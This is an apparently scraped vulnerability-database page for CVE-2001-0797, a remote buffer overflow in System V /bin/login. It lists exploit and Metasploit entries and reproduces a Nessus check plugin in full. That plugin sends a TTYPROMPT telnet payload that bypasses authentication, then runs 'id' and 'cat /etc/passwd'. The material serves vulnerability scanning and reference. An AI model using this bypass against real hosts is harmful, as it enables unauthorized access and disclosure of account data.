Vulnerabilities > CVE-2001-0797 - Buffer Overflow vulnerability in Multiple Vendor System V Derived 'login'
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
COMPLETE Integrity impact
COMPLETE Availability impact
COMPLETE Summary
Buffer overflow in login in various System V based operating systems allows remote attackers to execute arbitrary commands via a large number of arguments through services such as telnet and rlogin.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
OS | 5 | |
OS | 8 | |
OS | 5 | |
OS | 8 | |
OS | 17 |
Exploit-Db
description Solaris/SPARC 2.5.1/2.6/7/8 Derived 'login' Buffer Overflow Vulnerability. CVE-2001-0797. Remote exploit for solaris platform id EDB-ID:21180 last seen 2016-02-02 modified 2004-12-04 published 2004-12-04 reporter Marco Ivaldi source https://www.exploit-db.com/download/21180/ title Solaris/SPARC 2.5.1/2.6/7/8 Derived 'login' Buffer Overflow Vulnerability description Solaris 2.6/7/8 (TTYPROMPT in.telnet) Remote Authentication Bypass. CVE-2001-0797. Remote exploit for solaris platform id EDB-ID:57 last seen 2016-01-31 modified 2002-11-02 published 2002-11-02 reporter Jonathan S. source https://www.exploit-db.com/download/57/ title Solaris 2.6/7/8 TTYPROMPT in.telnet Remote Authentication Bypass description Solaris 2.x/7.0/8 Derived 'login' Buffer Overflow Vulnerability. CVE-2001-0797. Remote exploit for solaris platform id EDB-ID:21179 last seen 2016-02-02 modified 2003-01-09 published 2003-01-09 reporter snooq source https://www.exploit-db.com/download/21179/ title Solaris 2.x/7.0/8 Derived 'login' Buffer Overflow Vulnerability description System V Derived /bin/login Extraneous Arguments Buffer Overflow. CVE-2001-0797. Remote exploit for linux platform id EDB-ID:16928 last seen 2016-02-02 modified 2010-07-03 published 2010-07-03 reporter metasploit source https://www.exploit-db.com/download/16928/ title System V Derived /bin/login Extraneous Arguments Buffer Overflow description Solaris in.telnetd TTYPROMPT Buffer Overflow. CVE-2001-0797. Remote exploit for solaris platform id EDB-ID:9917 last seen 2016-02-01 modified 2002-01-18 published 2002-01-18 reporter MC source https://www.exploit-db.com/download/9917/ title Solaris in.telnetd TTYPROMPT - Buffer Overflow description Solaris 2.5.1/2.6/7/8 rlogin /bin/login Buffer Overflow Exploit (SPARC). CVE-2001-0797. Remote exploit for solaris platform id EDB-ID:716 last seen 2016-01-31 modified 2004-12-24 published 2004-12-24 reporter Marco Ivaldi source https://www.exploit-db.com/download/716/ title Solaris 2.5.1/2.6/7/8 rlogin /bin/login - Buffer Overflow Exploit SPARC description System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based). CVE-2001-0797. Remote exploit for solaris platform id EDB-ID:10036 last seen 2016-02-01 modified 2001-12-12 published 2001-12-12 reporter I)ruid source https://www.exploit-db.com/download/10036/ title System V Derived /bin/login Extraneous Arguments Buffer Overflow modem based description Solaris in.telnetd TTYPROMPT Buffer Overflow. CVE-2001-0797. Remote exploit for solaris platform id EDB-ID:16327 last seen 2016-02-01 modified 2010-06-22 published 2010-06-22 reporter metasploit source https://www.exploit-db.com/download/16327/ title Solaris in.telnetd TTYPROMPT Buffer Overflow description Solaris /bin/login Remote Root Exploit (SPARC/x86). CVE-2001-0797. Remote exploit for linux platform id EDB-ID:346 last seen 2016-01-31 modified 2001-12-20 published 2001-12-20 reporter Teso source https://www.exploit-db.com/download/346/ title Solaris /bin/login Remote Root Exploit SPARC/x86
Metasploit
description This module uses a buffer overflow in the Solaris 'login' application to bypass authentication in the telnet daemon. id MSF:EXPLOIT/SOLARIS/TELNET/TTYPROMPT last seen 2019-12-29 modified 2017-07-24 published 2006-01-31 references https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0797 reporter Rapid7 source https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/solaris/telnet/ttyprompt.rb title Solaris in.telnetd TTYPROMPT Buffer Overflow description This exploit connects to a system's modem over dialup and exploits a buffer overflow vulnerability in it's System V derived /bin/login. The vulnerability is triggered by providing a large number of arguments. id MSF:EXPLOIT/DIALUP/MULTI/LOGIN/MANYARGS last seen 2019-12-29 modified 2017-08-29 published 2009-06-29 references reporter Rapid7 source https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/dialup/multi/login/manyargs.rb title System V Derived /bin/login Extraneous Arguments Buffer Overflow
Nessus
NASL family Gain a shell remotely NASL id TTYPROMPT.NASL description The remote implementation of the /bin/login utility, used when authenticating a user via telnet or rsh contains an overflow which allows an attacker to gain a shell on this host, without even sending a shell code. An attacker may use this flaw to log in as any user (except root) on the remote host. last seen 2020-06-01 modified 2020-06-02 plugin id 11136 published 2002-10-03 reporter This script is Copyright (C) 2002-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/11136 title Multiple OS /bin/login Remote Overflow code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(11136); script_version("1.27"); script_cvs_date("Date: 2018/08/01 17:36:12"); script_cve_id("CVE-2001-0797"); script_bugtraq_id(3681, 5848); script_xref(name:"CERT-CC", value:"CA-2001-34"); script_name(english:"Multiple OS /bin/login Remote Overflow"); script_summary(english:"Attempts to log into the remote host"); script_set_attribute(attribute:"synopsis", value:"It is possible to execute arbitrary commands on the remote host."); script_set_attribute(attribute:"description", value: "The remote implementation of the /bin/login utility, used when authenticating a user via telnet or rsh contains an overflow which allows an attacker to gain a shell on this host, without even sending a shell code. An attacker may use this flaw to log in as any user (except root) on the remote host."); script_set_attribute(attribute:"solution", value:"Contact the vendor for a patch."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Solaris in.telnetd TTYPROMPT Buffer Overflow'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"vuln_publication_date", value:"2001/12/12"); script_set_attribute(attribute:"plugin_publication_date", value:"2002/10/03"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); # It might cause problem on some systems script_category(ACT_DESTRUCTIVE_ATTACK); script_copyright(english:"This script is Copyright (C) 2002-2018 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Gain a shell remotely"); script_dependencie("find_service1.nasl"); script_require_ports("Services/telnet", 23); exit(0); } include("data_protection.inc"); global_var soc; function init() { local_var c, i, lim, r, s; send(socket:soc, data:raw_string( 0xFF, 252, 0x25, 0xFF, 254, 0x26, 0xFF, 252, 0x26, 0xFF, 254, 0x03, 0xFF, 252, 0x18, 0xFF, 252, 0x1F, 0xFF, 252, 0x20, 0xFF, 252, 0x21, 0xFF, 252, 0x22, 0xFF, 0xFB, 0x27, 0xFF, 254, 0x05, 0xFF, 252, 0x23)); r = recv(socket:soc, length:30); lim = strlen(r); for(i=0;i<lim - 2;i=i+3) { if(!(ord(r[i+2]) == 0x27)) { if(ord(r[i+1]) == 251) c = 254; if(ord(r[i+1]) == 252) c = 254; if(ord(r[i+1]) == 253) c = 252; if(ord(r[i+1]) == 254) c = 252; s = raw_string(ord(r[i]), c, ord(r[i+2])); send(socket:soc, data:s); } } send(socket:soc, data:raw_string(0xFF, 0xFC, 0x24)); r = recv(socket:soc, length:300); send(socket:soc, data:raw_string(0xFF, 0xFA, 0x27, 0x00, 0x03, 0x54, 0x54, 0x59, 0x50, 0x52, 0x4F, 0x4D, 0x50, 0x54, 0x01, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0xFF, 0xF0)); } port = get_kb_item("Services/telnet"); if(!port)port = 23; if(!get_port_state(port))exit(0); soc = open_sock_tcp(port); if(soc) { buf = init(); send(socket:soc, data:string("bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\r\n")); r = recv(socket:soc, length:4096); if(!r)exit(0); send(socket:soc, data:string("id\r\n")); r = recv(socket:soc, length:1024); if("uid=" >< r){ send(socket:soc, data:string("cat /etc/passwd\r\n")); r = recv(socket:soc, length:4096); r = data_protection::redact_etc_passwd(output:r); report = string("Here is the output of the command 'cat /etc/passwd' :\n", r); security_hole(port:port, extra:report); } }
NASL family Gain a shell remotely NASL id BINLOGIN_OVERFLOW_TELNET.NASL description The remote /bin/login seems to crash when it receives too many environment variables. This is likely due to a buffer overflow vulnerability which might allow an attacker to execute arbitrary code on the remote host. last seen 2020-06-01 modified 2020-06-02 plugin id 10827 published 2001-12-15 reporter This script is Copyright (C) 2001-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/10827 title SysV /bin/login Environment Remote Overflow (telnet check) NASL family Gain a shell remotely NASL id BINLOGIN_OVERFLOW_RLOGIN.NASL description The remote /bin/login seems to crash when it receives too many environment variables. This is likely due to a buffer overflow vulnerability which might allow an attacker to execute arbitrary code on the remote host. last seen 2020-06-01 modified 2020-06-02 plugin id 10828 published 2001-12-15 reporter This script is Copyright (C) 2001-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/10828 title SysV /bin/login Environment Remote Overflow (rlogin)
Oval
accepted | 2005-02-23T09:25:00.000-04:00 | ||||
class | vulnerability | ||||
contributors |
| ||||
description | Buffer overflow in login in various System V based operating systems allows remote attackers to execute arbitrary commands via a large number of arguments through services such as telnet and rlogin. | ||||
family | unix | ||||
id | oval:org.mitre.oval:def:2025 | ||||
status | accepted | ||||
submitted | 2004-12-29T12:00:00.000-04:00 | ||||
title | System V login Buffer Overflow | ||||
version | 35 |
Packetstorm
data source https://packetstormsecurity.com/files/download/82329/ttyprompt.rb.txt id PACKETSTORM:82329 last seen 2016-12-05 published 2009-10-28 reporter MC source https://packetstormsecurity.com/files/82329/Solaris-in.telnetd-TTYPROMPT-Buffer-Overflow.html title Solaris in.telnetd TTYPROMPT Buffer Overflow data source https://packetstormsecurity.com/files/download/82226/manyargs.rb.txt id PACKETSTORM:82226 last seen 2016-12-05 published 2009-10-27 reporter I)ruid source https://packetstormsecurity.com/files/82226/System-V-Derived-bin-login-Extraneous-Arguments-Buffer-Overflow.html title System V Derived /bin/login Extraneous Arguments Buffer Overflow
Saint
bid | 3681 |
description | System V login argument array buffer overflow |
id | shell_loginbo |
osvdb | 690 |
title | systemv_login |
type | remote |
Seebug
bulletinFamily exploit description No description provided by source. id SSV:62958 last seen 2017-11-19 modified 2014-07-01 published 2014-07-01 reporter Root source https://www.seebug.org/vuldb/ssvid-62958 title Solaris 2.5.1/2.6/7/8 rlogin /bin/login - Buffer Overflow Exploit (SPARC) bulletinFamily exploit description No description provided by source. id SSV:75016 last seen 2017-11-19 modified 2014-07-01 published 2014-07-01 reporter Root source https://www.seebug.org/vuldb/ssvid-75016 title Solaris/SPARC 2.5.1/2.6/7/8 Derived 'login' Buffer Overflow Vulnerability bulletinFamily exploit description No description provided by source. id SSV:8658 last seen 2017-11-19 modified 2008-06-05 published 2008-06-05 reporter Root source https://www.seebug.org/vuldb/ssvid-8658 title Solaris 2.5.1/2.6/7/8 rlogin /bin/login Buffer Overflow Exploit (SPARC)
References
- ftp://patches.sgi.com/support/free/security/advisories/20011201-01-I
- ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.40/CSSA-2001-SCO.40.txt
- http://marc.info/?l=bugtraq&m=100844757228307&w=2
- http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/213
- http://www.cert.org/advisories/CA-2001-34.html
- http://www.kb.cert.org/vuls/id/569272
- http://www.securityfocus.com/archive/1/246487
- http://www.securityfocus.com/bid/3681
- http://www-1.ibm.com/support/search.wss?rs=0&q=IY26221&apar=only
- http://xforce.iss.net/alerts/advise105.php
- https://exchange.xforce.ibmcloud.com/vulnerabilities/7284
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2025